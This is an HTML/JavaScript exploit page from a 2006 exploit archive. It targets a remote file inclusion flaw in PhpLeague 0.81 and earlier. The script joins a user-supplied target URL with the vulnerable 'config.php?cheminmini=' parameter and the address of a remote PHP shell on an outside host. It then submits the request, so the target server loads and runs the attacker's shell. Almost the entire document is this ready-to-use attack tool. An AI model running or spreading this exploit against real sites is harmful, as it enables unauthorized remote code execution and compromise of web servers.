Php League <= 0.81 (config.php) Remote File Include Exploit

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>PhpLeague 0.81 Remote File Include Exploit</title> <script language="JavaScript"> //'=============================================================================================== //'[Script Name: Php League <= 0.81(cheminmini) Remote FILE Include Exploit //'[Coded by : ajann //'[Author : ajann //'[Contact : :( //'[Using : Write Target after Submit Click //'=============================================================================================== //Basic exploit,but any time : ( var adres="/config.php?" //FÝle name var acik ="cheminmini=" // Line 19 var shell="http://hometown.aol.com/yarivgiladi/musa.php?" // Shell Script function command(){ if (document.rfi.target1.value==""){ alert("Failed.."); return false; } rfi.action= document.rfi.target1.value+adres+acik+shell; // Ready Target : ) rfi.submit(); // Form Submit } </script> </head> <body bgcolor="#000000"> <center> <p><b><font face="Verdana" size="2" color="#008000">PhpLeague 0.81 Remote File Include Exploit</font></b></p> <p></p> <form method="post" target="getting" name="rfi" onSubmit="command();"> <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]</font><font color="#00FF00" size="2" face="Arial"> </font><font color="#FF0000" size="2"> </font></b> <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p> <p><input type="submit" value="Gönder" name="B1"><input type="reset" value="Sýfýrla" name="B2"></p> </form> <p><br> <iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe> </p> <b><font face="Verdana" size="2" color="#008000">ajann</font></b></p> </center> </body> </html> # milw0rm.com [2006-10-25]